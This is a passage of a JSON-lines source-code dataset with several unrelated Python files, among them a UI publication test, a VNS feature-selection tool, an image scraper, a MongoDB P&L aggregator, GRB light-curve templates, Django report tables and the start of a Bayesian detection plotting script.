{0}'.format(random.randint(0,65536))\ndata['abstract'] = 'Abstract {0}'.format(random.randint(0,65536))\ndata['description'] = 'Description {0}'.format(random.randint(0,65536))\ndata['authors'] = 'Jerry Huang'\ndata['short_image'] = '256x256.png'\ndata['imagename'] = os.getcwd() + data['short_image']\ndata['short_docs'] = 'testfile.txt'\ndata['docsname'] = os.getcwd() + data['short_docs']\ndata['license'] = 'CC0 - Creative Commons'\ndata['tags'] = 'Tag{0}'.format(random.randint(0,65536))\ndata['release_notes'] = 'Notes {0}'.format(random.randint(0,65536))\n\njames.attemptsTo(gotoPublications)\njames.mustBe(atPublications)\njames.attemptsTo(startPublication)\n\njames.mustBe(atPublicationContent)\njames.attemptsTo(addPublicationFile)\njames.mustBe(atPublicationFileDialog)\njames.attemptsTo(selectPublicationFile(data))\njames.mustHave(publicationFileSelected(data))\njames.attemptsTo(gotoPublicationDescription)\n\njames.mustBe(atPublicationDescription)\njames.attemptsTo(setPublicationTitle(data))\ntime.sleep(5)\njames.attemptsTo(setPublicationAbstract(data))\ntime.sleep(5)\njames.attemptsTo(setPublicationDescription(data))\n\njames.mustBe(atPublicationAuthors)\njames.attemptsTo(addPublicationAuthor)\njames.mustBe(atPublicationAuthorDialog)\njames.attemptsTo(selectPublicationAuthor(data))\njames.mustHave(publicationAuthorAdded(data))\njames.attemptsTo(gotoPublicationExtras)\n\njames.mustBe(atPublicationExtras)\njames.attemptsTo(addPublicationImage)\njames.mustBe(atPublicationFileDialog)\njames.attemptsTo(selectPublicationFile(data))\njames.mustHave(publicationFileSelected(data))\njames.attemptsTo(addPublicationDocs)\njames.mustBe(atPublicationFileDialog)\njames.attemptsTo(selectPublicationDocs(data))\njames.mustHave(publicationDocsAdded(data))\njames.attemptsTo(gotoPublicationLicense)\n\njames.mustBe(atPublicationLicense)\njames.attemptsTo(addPublicationAuthor)\njames.mustBe(atPublicationLicenseDialog)\njames.attemptsTo(selectPublicationLicense(data))\njames.mustHave(publicationLicenseSelected(data))\njames.attemptsTo(agreeToLicenseTerms)\ntime.sleep(1)\njames.attemptsTo(gotoPublicationTags)\n\njames.mustBe(atPublicationTags)\njames.attemptsTo(populatePublicationTags(data))\ntime.sleep(1)\njames.attemptsTo(gotoPublicationNotes)\n\njames.mustBe(atPublicationNotes)\njames.attemptsTo(populatePublicationNotes(data))\ntime.sleep(1)\njames.attemptsTo(gotoPublicationReview)\n\njames.mustBe(atPublicationReview)\njames.attemptsTo(agreeToPublicationTerms)\ntime.sleep(1)\njames.attemptsTo(submitPublication)\n\njames.mustHave(publicationPublished)\njames.attemptsTo(gotoPublicationPage)\n\njames.mustBe(atPublicationAbout)\njames.shouldBe(matchingPublicationAbout(data))\njames.attemptsTo(gotoPublicationSupportingDocs)\n\njames.mustBe(atPublicationSupportingDocs)\njames.shouldBe(matchingPublicationSupportingDocs(data))\n\njames.report()\njames.finish()\nsys.exit()\n","sub_path":"com_projects/publication.py","file_name":"publication.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392050322","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 21:51:42 2018\n\n@author: bruno\n\"\"\"\n\nfrom modules.vns import VNS, Item\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nimport sklearn.feature_selection as fs\nimport numpy as np\nimport copy\nfrom operator import attrgetter\nimport random\nimport argparse\nimport time\nimport pandas as pd\n\n### Function for formatting time in human readable format\ndef get_formatted_time(s):\n decimal_part = s - int(s)\n\n s = int(s)\n\n seconds = s % 60\n\n s = s // 60\n minutes = s % 60\n\n s = s // 60\n hours = s % 24\n\n days = s // 24\n\n if days:\n d = '%dd ' % days\n else:\n d = ''\n\n return '%s%02dh%02dm%02d.%ds' % (d, hours, minutes, seconds, decimal_part)\n\nclass SPItem(Item):\n def __init__(self, name, item_id, insertion_cost):\n super(SPItem, self).__init__(item_id, insertion_cost)\n self.name = name\n\n def __repr__(self):\n return repr((self.name, self.insertion_cost))\n\nclass SPProblem(object):\n def __init__(self, k, metric, seed, data, min_size, max_size, corr_threshold,\n maximise=True, min_possible=2):\n self.k = k\n self.metric = metric\n if seed < 0:\n self.seed = None\n else:\n self.seed = seed\n self.km = KMeans(n_clusters=self.k, random_state=self.seed, n_jobs=-1)\n self.labels = None\n self.data = data\n self.min_size = min_size\n self.max_size = max_size\n self.min_possible = min_possible\n self.max_possible = len(self.data.columns)\n self.maximise = maximise\n self.hash = {}\n self.hash_access = 0\n self.hash_add = 0\n\n ### constraints creation\n self.attributes = list(self.data.columns)\n self.constraints_feasibility = []\n self.constraints_build = None\n self.constraints_counts = {}\n self.corr_threshold = corr_threshold\n\n self.corr = None\n self.create_constraints()\n\n ### items creation\n self.variances = self.get_variances()\n self.items = []\n self.create_items()\n\n def get_num_hash(self):\n return len(self.hash)\n\n def create_constraints(self):\n for attr in self.attributes:\n self.constraints_counts[attr] = 0\n\n self.corr = self.data.corr()\n self.constraints_build = np.zeros((len(self.attributes), len(self.attributes)), dtype=int)\n for i in range(0, len(self.attributes)-1):\n for j in range(i+1, len(self.attributes)):\n if abs(self.corr[self.attributes[i]][self.attributes[j]]) >= self.corr_threshold:\n self.constraints_build[i][j] = 1\n self.constraints_build[j][i] = 1\n self.constraints_counts[self.attributes[i]] += 1\n self.constraints_counts[self.attributes[j]] += 1\n constraint = np.zeros(len(self.attributes), dtype=int)\n constraint[i] = 1\n constraint[j] = 1\n self.constraints_feasibility.append(constraint)\n self.constraints_feasibility = np.array(self.constraints_feasibility)\n #print('shape ', self.constraints_feasibility.shape)\n\n ### Get variances for attributes\n def get_variances(self):\n sel = fs.VarianceThreshold()\n sel.fit(self.data)\n return zip(self.attributes, sel.variances_)\n\n def create_items(self):\n # pair\n for pair in self.variances:\n cost = pair[1]*10 / (1 + self.constraints_counts[pair[0]])\n item_id = np.zeros(len(self.attributes), dtype=int)\n item_id[self.attributes.index(pair[0])] = 1\n self.items.append(SPItem(pair[0], item_id, cost))\n\n def check_hash(self, solution):\n self.hash_access += 1\n solution_hash = solution.get_hash()\n if solution_hash in self.hash:\n return self.hash[solution_hash]\n\n return None\n\n def add_to_hash(self, solution, evaluation):\n self.hash_add += 1\n solution_hash = solution.get_hash()\n self.hash[solution_hash] = evaluation\n\n def get_hash_access(self):\n return self.hash_access\n\n def get_hash_add(self):\n return self.hash_add\n\n def get_vector(self, solution):\n vector = copy.deepcopy(solution.items[0].id)\n for i in range(1, len(solution.items)):\n vector += solution.items[i].id\n\n return vector\n\n def precompute_violations(self, solution):\n vector = self.get_vector(solution)\n\n att_sel = []\n n_selected = 0\n for selected, attr in zip(vector, self.attributes):\n if selected:\n n_selected += 1\n att_sel.append(attr)\n\n if n_selected < self.min_size or n_selected > self.max_size:\n return len(self.constraints_feasibility)+1, att_sel\n else:\n violations = 0\n for i in range(len(self.constraints_feasibility)):\n if np.sum(np.bitwise_and(vector, self.constraints_feasibility[i])) >= 2:\n violations += 1\n\n return violations, att_sel\n\n ### cost function\n def cost(self, solution):\n evaluation = self.check_hash(solution)\n if evaluation is not None:\n return evaluation\n\n violations, att_sel = self.precompute_violations(solution)\n self.labels = self.km.fit_predict(self.data[att_sel])\n evaluation = silhouette_score(self.data[att_sel], self.labels, self.metric)\\\n - np.log(1 + violations)\n\n self.add_to_hash(solution, evaluation)\n\n return evaluation\n\nclass VNS_SetPack(VNS):\n def __init__(self, time, problem, n_neighborhood, max_iter, elite_size, const, invert, max_no_improv, verbose, *args):\n super(VNS_SetPack, self).__init__(time, problem, n_neighborhood, max_iter,\n elite_size, const, args, invert, max_no_improv, verbose)\n\n def number_solutions_hash(self):\n return self.problem.get_num_hash()\n\n def cost(self, solution):\n return self.problem.cost(solution)\n\n def check_feasibility(self, solution):\n latest = solution[-1]\n f = attrgetter('name')\n if self.problem.constraints_counts[latest.name]:\n index = self.problem.attributes.index(latest.name)\n for i, value in enumerate(self.problem.constraints_build[index]):\n if value:\n attr = self.problem.attributes[i]\n #for pos, obj in enumerate(self.rcl):\n # if attr == f(obj):\n # self.rcl.remove(self.rcl[pos])\n # break\n\n return True\n\n def reevaluate_rcl_items(self):\n pass\n\n def items_from_vector(self, vector):\n f = attrgetter('name')\n new_items = []\n for bit, attr in zip(vector, self.problem.attributes):\n if bit:\n for item in self.items:\n if attr == f(item):\n new_items.append(copy.deepcopy(item))\n break\n\n return new_items\n\n def analyse_vector(self, vector):\n item_count = 0\n zeros = []\n ones = []\n for i,item in enumerate(vector):\n item_count += item\n if item:\n ones.append(i)\n else:\n zeros.append(i)\n\n return item_count, ones, zeros\n\n def get_neighbor(self, solution):\n '''vector = self.problem.get_vector(solution)\n item_count, ones, zeros = self.analyse_vector(vector)\n proximity = int(self.ls_count / self.max_no_improv * 100)\n\n if item_count <= 2:\n flip_index = random.choice(zeros)\n vector[flip_index] = 1\n elif proximity < 80:\n flip_index = random.randint(0, len(vector)-1)\n vector[flip_index] = (0, 1)[vector[flip_index] == 0]\n elif item_count == 3:\n flip_index = flip_index2 = random.choice(zeros)\n vector[flip_index] = 1\n while flip_index2 == flip_index:\n flip_index2 = random.randint(0, len(vector)-1)\n vector[flip_index2] = (0, 1)[vector[flip_index] == 0]\n else:\n flip_indexes = random.sample(range(len(vector)), 2)\n vector[flip_indexes[0]] = (0, 1)[vector[flip_indexes[0]] == 0]\n vector[flip_indexes[1]] = (0, 1)[vector[flip_indexes[1]] == 0]\n\n\n return self.items_from_vector(vector)'''\n pass\n\n### Function to print a solution\ndef print_solution(solution):\n s = 'solution: ['\n f = attrgetter('name')\n att_sel = [f(item) for item in solution.items]\n print(att_sel)\n s += ', '.join(str(e) for e in att_sel) + '], evaluation: %f' % (solution.evaluation)\n\n print(s)\n\ndef save_solutions(vns, data, time, max_gen_reached, args):\n dic = vars(args)\n\n s = 'File %s\\n' % dic['csv_file']\n\n s += 'elapsed_time;max_gen_reached\\n'\n s += '%f;%s\\n' % (time, str(max_gen_reached))\n\n items = []\n for param in sorted(dic.keys()):\n if param != 'csv_file':\n items.append(param)\n items = ';'.join(items) + '\\n'\n s += items\n\n items = []\n for param in sorted(dic.keys()):\n if param != 'csv_file':\n items.append(str(dic[param]))\n items = ';'.join(items) + '\\n'\n s += items\n\n s += 'Elite\\n'\n\n head = ['evaluation']\n for i in range(len(data.columns)):\n head.append(data.columns[i])\n head = ';'.join(str(e) for e in head)\n s += head + '\\n'\n\n f = attrgetter('id')\n for sol in vns.elite:\n vector = np.zeros(len(data.columns), dtype=int)\n for item in sol.items:\n att_id = f(item)\n vector += att_id\n\n s += '%f;' % sol.evaluation\n s += ';'.join([str(bit) for bit in vector]) + '\\n'\n\n if args.lang == 'pt':\n s = s.replace('.', ',')\n\n row = [ 'Mean', 'Std', 'It_total', 'It_best', 'Time_best', 'Number_solutions_hash', 'Hash_access', 'Hash_add' ]\n row = ';'.join(str(e) for e in row)\n\n s += str(row) + '\\n'\n mean, std = vns.mean_std_elite()\n row = [ mean, std, vns.get_iteration(), vns.get_best_iteration(), vns.get_time_best(), vns.number_solutions_hash(), vns.problem.get_hash_access(), vns.problem.get_hash_add() ]\n row = ';'.join(str(e) for e in row)\n\n s += str(row)\n\n fp = open(args.csv_file, 'w')\n fp.write(s)\n fp.close()\n\ndef return_funcs(str):\n f = []\n for x in str:\n if x == 'a':\n f.append('flip_index')\n elif x == 'b':\n f.append('add_index')\n elif x == 'c':\n f.append('sub_index')\n\n return f\n\ndef main():\n ### Parsing command line arguments\n parser = argparse.ArgumentParser(description='Feature selection tool, using GRASP (Problem Modeled as Set Packing)')\n parser.add_argument('csv_file', help='csv file to save output data')\n parser.add_argument('--lang', default='en', help='Whether use . or , as floating point number decimal separator in output. If lang=en, uses dot if lang=pt, uses comma (default=en)')\n parser.add_argument('--k', type=int, default=10, help='Number of clusters (default=10)')\n parser.add_argument('--seed', type=int, default=-1, help='Random seed (default=-1). Use -1 for totally uncontrolled randomness')\n parser.add_argument('--metric', default='c', choices=['e', 'c'], help='Metric to optimize: e | c | i | v (silhouette with euclidean distance, silhouette with cosine distance) (default=c)')\n parser.add_argument('--max_iter', type=int, default=300, help='Maximum Number of Iterations (default=100)')\n parser.add_argument('--max_no_improv', '-mximp', type=float, default=0.2, help='Percentage of generations with no improvement to force GRASP to stop (default=0.2)')\n parser.add_argument('--elsize', default=10, type=int, help='Number of solutions to keep in the elite (default=10)')\n parser.add_argument('--mins', type=int, default=3, help='Minimum size of solution (default=3)')\n parser.add_argument('--maxs', type=int, default=6, help='Maximum size of solution (default=6)')\n parser.add_argument('--corr_threshold', '-crth', type=float, default=0.75, help='Value for correlation threshold (absolute value). Used to create constraints (default=0.75)')\n parser.add_argument('--verbose', '-v', action='store_true', help='Verbose excution of GRASP (default=False)')\n parser.add_argument('--dt', type=int, default=1, help='Choose data: 1 - wines | 2 - moba | 3 - seizure (defaut=1)')\n parser.add_argument('--const', type=int, default=1, help='Choose contructive method: 1 - Value | 2 - Cardinality (default=1)')\n parser.add_argument('--time', type=int, default=7200, help='Maximum execution time. | 60 = 60s | 3600 = 1h | (default=60s)')\n parser.add_argument('--invert', type=int, default=0, help='Invert functions (default=0)')\n parser.add_argument('--n_neighborhood', type=int, default=3, help='(default=0.3)')\n parser.add_argument('--funcs', default='abc', help='Select funcs: a -> func1, b -> func2... (default=abc)')\n\n args = parser.parse_args()\n\n ### Loading data\n if args.dt == 1:\n json_file = 'modules/databases/vinhos/wine_normalized_no_outlier.json'\n elif args.dt == 2:\n json_file = 'modules/databases/moba-gabriel/data_normalized_no_outlier.json'\n elif args.dt == 3:\n json_file = 'modules/databases/convulsao/seizure_normalized_no_outlier.json'\n\n data = pd.read_json(json_file)\n\n if args.metric == 'c':\n maximise = True\n problem = SPProblem(args.k,\n 'cosine',\n args.seed,\n data,\n args.mins,\n args.maxs,\n args.corr_threshold,\n maximise=maximise)\n else:\n maximise = True\n problem = SPProblem(args.k,\n 'euclidean',\n args.seed,\n data,\n args.mins,\n args.maxs,\n args.corr_threshold,\n maximise=maximise)\n\n f = return_funcs(args.funcs)\n\n vns = VNS_SetPack(args.time, problem, args.n_neighborhood, args.max_iter, args.elsize, args.const, args.invert, args.max_no_improv, args.verbose, f)\n\n ### Executing VNS\n start_time = time.time()\n max_gen_reached = vns.run()\n elapsed_time = time.time() - start_time\n\n print('\\nElite:')\n for s in vns.get_elite():\n print_solution(s)\n\n print('\\nBest solution found', end=' ')\n print(vns.get_best())\n\n print('\\nTotal elapsed time: %s' % (get_formatted_time(elapsed_time)))\n\n if not max_gen_reached:\n print('\\nStopped after %d generations without improvement.\\n' % int(args.max_no_improv * args.max_iter))\n\n \"\"\"print('Mean, std: ', vns.mean_std_elite())\n print('Iterations total: ', vns.iteration)\n print('Iteration best: ', vns.best_iteration)\n print('Number of solutions in the hash: ', vns.number_solutions_hash())\n print('Hash access: ', vns.problem.hash_access)\n print('Hash add: ', vns.problem.hash_add)\"\"\"\n\n save_solutions(vns, data, elapsed_time, max_gen_reached, args)\n\nif __name__ == '__main__':\n main()\n","sub_path":"bruno/vns_setpack.py","file_name":"vns_setpack.py","file_ext":"py","file_size_in_byte":15378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"565666200","text":"#!/usr/bin/python\n# coding=utf-8\n\n\"\"\"\n用 Python 写一个爬图片的程序,\n\"\"\"\n\nimport os\nimport urllib2\nfrom bs4 import BeautifulSoup\nfrom urlparse import urlsplit\n\n\ndef catch_pic(url):\n # 打开一个url的方法,返回一个文件对象,然后可以进行类似文件对象的操作。\n html = urllib2.urlopen(url)\n # 利用次文件对象打开url代表的html文件对象\n bs = BeautifulSoup(html, 'lxml')\n # 寻找所有img标签\n for i in bs.find_all('img'):\n # 将img标签里的src属性 也就是图片的网址属性传入\n down_pic(i['src'])\n\n\ndef down_pic(url):\n # 读取图片的地址\n img = urllib2.urlopen(url).read()\n # urlsplit方法将url分成了5个部分 第三个代表的是路径\n file_name = os.path.basename(urlsplit(url)[2])\n output = open(file_name, 'wb')\n output.write(img)\n output.close()\n\n # with open(file_name,'wb') as f:\n # f.write(img)\n\n\nif __name__ == \"__main__\":\n catch_pic('http://tieba.baidu.com/p/2166231880')\n","sub_path":"catch_pic.py","file_name":"catch_pic.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447283522","text":"import pymongo\r\nfrom pymongo import MongoClient\r\nimport datetime\r\nimport time\r\nfrom flask import Flask\r\nfrom flask_socketio import SocketIO\r\nimport socket\r\n\r\ndate = datetime.date.today()\r\n\r\nclient = MongoClient()\r\n\r\ntry:\r\n db = client[\"finalpnl\"]\r\n collec = f\"finalpnl_{date}\"\r\n db.create_collection(collec)\r\n print(\"finalpnl is created\")\r\n\r\nexcept Exception as e:\r\n print(e) \r\n\r\ntry:\r\n db1 = client[\"clientWiseTotalPnl\"]\r\n collec1 = f\"clientWiseTotalPnl_{date}\"\r\n db1.create_collection(collec1)\r\n print(\"clientWiseTotalPnl is created\")\r\n\r\nexcept Exception as e:\r\n print(e) \r\n\r\n\r\nwhile True:\r\n orders = db[collec].find()\r\n for order in orders:\r\n cID = order[\"clientID\"]\r\n urPnl = order[\"strategywise_pnl\"]\r\n \r\n match = db[collec].find({\"clientID\": cID})\r\n \r\n newUrTotal = 0\r\n if match:\r\n for i in match:\r\n newUrTotal = float(i[\"strategywise_pnl\"]) + newUrTotal\r\n \r\n matchInDb1 = db1[collec1].find_one({\"clientID\": cID})\r\n post = {\"clientID\":cID, \"unRealized_pnl\": newUrTotal}\r\n if matchInDb1:\r\n db1[collec1].update({\"_id\":matchInDb1[\"_id\"]}, {\"$set\":post})\r\n\r\n else:\r\n db1[collec1].insert_one(post)\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Symphony/unrealized/client_TotalPnl.py","file_name":"client_TotalPnl.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"149019595","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Main module.\"\"\"\n\nimport numpy as np\nfrom collections import OrderedDict\nfrom astropy.cosmology import Planck15 as cosmo\nfrom . import constants as cc\nimport gc\nimport sys\n\n\nclass Templates(object):\n \"\"\" Power law, broken power law...\"\"\"\n\n def __init__ (self, F0=500, t0=300,wvl0=6400):\n \"\"\"\n F0: flux normaliqation in Jy\n t0: time corresponding to the normalisation, in s\n wvl0: wavelength corresponding to the normalisation, in angstrom\n \"\"\"\n self.F0=F0\n self.t0=t0\n self.wvl0=wvl0\n\n return None\n\n def SPL(self,wvl,t,alpha,beta):\n \"\"\" Simple Power Law. wvl and t must bhave same dimensions as wvl0 and t0\"\"\"\n\n F= self.F0 * (t/self.t0)**(-alpha) * (wvl/self.wvl0)**(beta)\n return F\n\n def BPL(self,wvl,t,alpha1,alpha2,beta,s):\n \"\"\" Broken Power Law. wvl and t must bhave same dimensions as wvl0 and t0 \"\"\"\n #print (self.F0,self.wvl0,self.t0)\n #print (wvl,t)\n #print (alpha1,alpha2,beta,s)\n F= self.F0 * (wvl/self.wvl0)**(beta) * ((t/self.t0)**(-s*alpha1) + (t/self.t0)**(-s*alpha2)) **(-1/s)\n return F\n\n def light_curve(self,wavelength,time,params,model='SPL'):\n \"\"\" build light cirves \"\"\"\n time_series=np.atleast_1d(time)\n wavelength=np.atleast_1d(wavelength)\n lc=[]\n t1=len(time)\n wvl1=len(wavelength)\n for t in range(t1):\n sed=[]\n for wvl in range(wvl1):\n if model == 'SPL':\n alpha,beta= params\n SED=self.SPL(wavelength[wvl],time[t],alpha,beta)\n\n elif model == 'BPL':\n alpha1,alpha2,beta,s=params\n SED=self.BPL(wavelength[wvl],time[t],alpha1,alpha2,beta,s)\n\n sed.append( SED) # Flux in obs frame in same unit as F0\n\n lc.append(sed) # Flux in obs frame in same unit as F0\n return np.array(lc)\n \n","sub_path":"pyGRBaglow/template_models.py","file_name":"template_models.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"318261190","text":"import nav.models as m\nfrom django.template.defaultfilters import floatformat\nfrom operator import itemgetter\n\ndef test():\n return ('People Names',\n [\n {\n 'first_name':'monte',\n 'last_name': 'davis',\n 'age':42\n },\n {\n 'first_name':'ana',\n 'last_name': 'davis',\n 'age':26\n }\n \n ],\n ['first_name','last_name','age'],\n ['First Name', 'Last Name', 'Age'])\n \ndef staff_raw():\n lofd=[]\n for emp in m.Employee.objects.exclude(status=2):\n try:\n project=emp.project.project\n except:\n project='NULL'\n row={\n 'employee_id':emp.employee_id,\n 'project':p,\n 'first_name':emp.first_name,\n 'last_name':emp.last_name,\n 'company':emp.company,\n 'manager':emp.manager,\n 'job_title':emp.job_title,\n 'status':emp.status,\n 'accrual_start_date':emp.accrual_start_date,\n 'position_date':emp.position_date,\n 'inactive_date':emp.inactive_date,\n 'termination_date':emp.termination_date,\n 'employment_type':emp.employment_type,\n 'contractor':emp.contractor,\n 'hours':floatformat(emp.hours,1),\n 'percentage':emp.percentage,\n 'short_id':emp.short_id\n }\n lofd.append(row)\n lofd = sorted(lofd, key=itemgetter('short_id'), reverse=False) \n \n return ('Employees',\n lofd,\n [\n 'employee_id',\n 'project',\n 'first_name',\n 'last_name',\n 'company',\n 'manager',\n 'job_title',\n 'status',\n 'accrual_start_date',\n 'position_date',\n 'inactive_date',\n 'termination_date',\n 'employment_type',\n 'contractor',\n 'hours',\n 'percentage',\n 'short_id'\n ],\n [\n 'employee_id',\n 'project',\n 'first_name',\n 'last_name',\n 'company',\n 'manager',\n 'job_title',\n 'status',\n 'accrual_start_date',\n 'position_date',\n 'inactive_date',\n 'termination_date',\n 'employment_type',\n 'contractor',\n 'hours',\n 'percentage',\n 'short_id'\n ])\n\n \ndef job_lines_raw():\n lofd=[]\n for jjl in m.JobJournalLine.objects.filter(recurring_method__gt=0):\n try:\n row={\n 'job_id':jjl.job_id,\n 'job_no':jjl.job.job_no,\n 'description':jjl.job.description,\n 'customer_id':jjl.job.customer_id,\n 'customer_name':jjl.job.customer.name,\n 'person_responsible':jjl.job.person_responsible,\n 'project_code':jjl.project_code,\n 'line_no':jjl.line_no,\n 'mrr_code':jjl.mrr_code,\n 'recurring_method_literal':jjl.recurring_method_literal,\n 'type_literal':jjl.type_literal,\n 'line_type_literal':jjl.line_type_literal,\n 'no':jjl.no_code,\n 'prod_code':jjl.no_code[:2],\n 'line_amount':floatformat(jjl.line_amount,2),\n 'last_variable_amount':floatformat(jjl.last_variable_amount,2),\n 'conversion_rate':floatformat(jjl.conversion_rate,2),\n 'no_of_recurrencies':jjl.no_of_recurrencies,\n 'times_posted':jjl.times_posted,\n 'remaning_periods':jjl.remaning_periods,\n 'sold_date':jjl.sold_date,\n 'first_invoice_date':jjl.first_invoice_date,\n 'expiration_date':jjl.expiration_date,\n 'legal_entity':jjl.legal_entity,\n #'internal_customer':jjl.job.internal_customer\n \n }\n except:\n row={\n 'job_id':jjl.job_id,\n 'job_no':'n.a.',\n 'description':'n.a.',\n 'customer_id':'n.a.',\n 'customer_name':'n.a.',\n 'person_responsible':'n.a.',\n 'project_code':jjl.project_code,\n 'line_no':jjl.line_no,\n 'mrr_code':jjl.mrr_code,\n 'recurring_method_literal':jjl.recurring_method_literal,\n 'type_literal':jjl.type_literal,\n 'line_type_literal':jjl.line_type_literal,\n 'no':jjl.no_code,\n 'prod_code':'n.a.',\n 'line_amount':floatformat(jjl.line_amount,2),\n 'last_variable_amount':floatformat(jjl.last_variable_amount,2),\n 'conversion_rate':floatformat(jjl.conversion_rate,2),\n 'no_of_recurrencies':jjl.no_of_recurrencies,\n 'times_posted':jjl.times_posted,\n 'remaning_periods':jjl.remaning_periods,\n 'sold_date':jjl.sold_date,\n 'first_invoice_date':jjl.first_invoice_date,\n 'expiration_date':jjl.expiration_date,\n 'legal_entity':jjl.legal_entity,\n #'internal_customer':0\n }\n \n lofd.append(row) \n \n return ('Job Lines',\n lofd,\n [\n 'job_id',\n 'job_no',\n 'description',\n 'customer_id',\n 'customer_name',\n 'person_responsible',\n 'project_code',\n 'line_no',\n 'mrr_code',\n 'recurring_method_literal',\n 'type_literal',\n 'line_type_literal',\n 'no',\n 'prod_code',\n 'line_amount',\n 'last_variable_amount',\n 'conversion_rate',\n 'no_of_recurrencies',\n 'times_posted',\n 'remaning_periods',\n 'sold_date',\n 'first_invoice_date',\n 'expiration_date',\n 'legal_entity',\n #'internal_customer'\n ],\n [\n 'job id',\n 'Number',\n 'Description',\n 'Customer Id',\n 'Customer Name',\n 'Person Responsible',\n 'Project Code',\n 'line_no',\n 'MRR/SETUP',\n 'Fixed/Variable',\n 'Resource/Item',\n 'Contract/Schedule',\n 'No',\n 'Prod Code',\n 'Line amount',\n 'Last Variable Amount',\n 'Conversion rate',\n 'No of recurrencies',\n 'Times posted',\n 'Remaning periods',\n 'Sold date',\n 'First Invoice date',\n 'Expiration date',\n 'Legal Entity',\n #'Is Internal Customer'\n ])\n\n\ndef job_lines_raw_2():\n lofd=[]\n for jjl in m.JobJournalLine.objects.all():\n try:\n row={'job_num':jjl.new_job_name,'job_line_id':jjl.job_line_id}\n except:\n row={'job_num':'Does Not Exist','job_line_id':jjl.job_line_id}\n \n lofd.append(row) \n \n return ('Job Lines',\n lofd,\n ['job_num','job_line_id'],\n ['Number','ID'])\n \ndef job_lines_raw_3():\n return ('Job Lines',\n m.JobJournalLine.objects.all().values(),\n ['line_no','job_line_id'],\n ['Number','ID'])\n \n\ndef job_lines_raw_4():\n lofd=[]\n for jjl in m.JobJournalLine.objects.all():\n row={}\n row['Hi']=jjl.job_line_id\n row['Bye']= 3*12+15\n lofd.append(row) \n \n return ('Job Lines',\n lofd,\n ['Hi','Bye'],\n ['Number','ID'])","sub_path":"forecast/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"209085194","text":"import matplotlib\nmatplotlib.rcParams['figure.figsize'] = (5,5)\nmatplotlib.use('Agg')\nmatplotlib.rc('text', usetex=True)\nmatplotlib.rc('font', family='serif')\nimport pylab as plt\nimport numpy as np\nfrom scipy.special import erf\nfrom scipy.stats import norm\n\n'''\n\n2-band example showing behavior of Bayesian SED-matched detection.\n\nWe first show the behavior of a single \"red\" detection filter.\n\n(Next, we look at a two-SED prior and examine how the weights affect\nthe locus of the threshold.)\n\nThen we look at a three-SED model (\"flat\", \"red\", and \"r-only\").\n\nFinally, we look at an empirical (DECaLS) SED.\n\n'''\n\nplt.subplots_adjust(left=0.1, right=0.98, bottom=0.1, top=0.98)\n\n# Assuming unit variance on the detection maps; signal = S/N.\nsig_g = 1.\nsig_r = 1.\nsig_j = np.array([sig_g, sig_r])\n\nsed_red = np.array([1., 2.5])\nsed_red /= np.sum(sed_red)\n\nsed_ronly = np.array([0., 1.])\n\nsed_flat = np.array([1., 1.])\nsed_flat /= np.sum(sed_flat)\n\n# Grid of detection-map values\n#dextent = [-5,10,-5,10]\n#dextent = [-5,11,-5,11]\ndextent = [-5.5,11,-5.5,11]\ndgvals = np.linspace(dextent[0], dextent[1], 320)\ndrvals = np.linspace(dextent[2], dextent[3], 320)\nd_j = np.array(np.meshgrid(dgvals, drvals))\n# d_j: shape (2, N, N)\n# Plotting axes for some plots\nax1 = [-2,10,-2,10]\n\ndef get_pratio(d_j, sig_j, sed_i, alpha = 1.):\n '''\n Get the probability ratio (fg/bg) for given data points and SED.\n\n alpha: exponential prior on total flux\n '''\n a_i = alpha - np.sum(d_j * sed_i[:,np.newaxis,np.newaxis] / sig_j[:,np.newaxis,np.newaxis]**2, axis=0)\n b_i = 0.5 * np.sum(sed_i**2 / sig_j**2)\n beta_i = 2 * np.sqrt(b_i)\n c_i = a_i / beta_i\n pratio_i = alpha * np.sqrt(np.pi) / beta_i * np.exp(c_i**2) * (1. - erf(c_i))\n return pratio_i\n\n\n# Background probability\np_bg = 1./np.prod(np.sqrt(2.*np.pi)*sig_j) * np.exp(-0.5 * np.sum((d_j / sig_j[:,np.newaxis,np.newaxis])**2, axis=0))\n\npratio_red = get_pratio(d_j, sig_j, sed_red)\npratio_ronly = get_pratio(d_j, sig_j, sed_ronly)\npratio_flat = get_pratio(d_j, sig_j, sed_flat)\n\npratio_a = pratio_red\np_fg_a = p_bg * pratio_a\n\n# 5-sigma (one-sided) Gaussian false positive rate, for comparison\n# falsepos = norm.sf(5.)\n# print(falsepos)\n# print(falsepos * 4e3*4e3, 'false positives per 4k x 4k image')\n\ndef contour_plot(p_bg, p_fg, seds,\n style1=dict(linestyles='-', alpha=0.3, linewidths=3, colors='k'),\n style2=dict(linestyles='-', colors='b'),\n label1='Background (noise) model',\n label2='Foreground (source) model'):\n levs = np.arange(-6, 0)\n c1 = plt.contour(np.log10(p_bg), levels=levs, extent=dextent, **style1)\n c2 = plt.contour(np.log10(p_fg), levels=levs, extent=dextent, **style2)\n \n plt.xlabel('g-band detection map S/N')\n plt.ylabel('r-band detection map S/N')\n plt.axhline(0, color='k', alpha=0.2)\n plt.axvline(0, color='k', alpha=0.2)\n xx = np.array([0,100])\n for sed,c in seds:\n plt.plot(xx * sed[0], xx * sed[1], '-', color=c, alpha=0.5, lw=3)\n plt.axis('square')\n plt.legend([c2.collections[0], c1.collections[0]],\n [label2, label1],\n loc='lower right')\n\ndef rel_contour_plot(pratio, seds):\n levs = np.arange(0, 11)\n 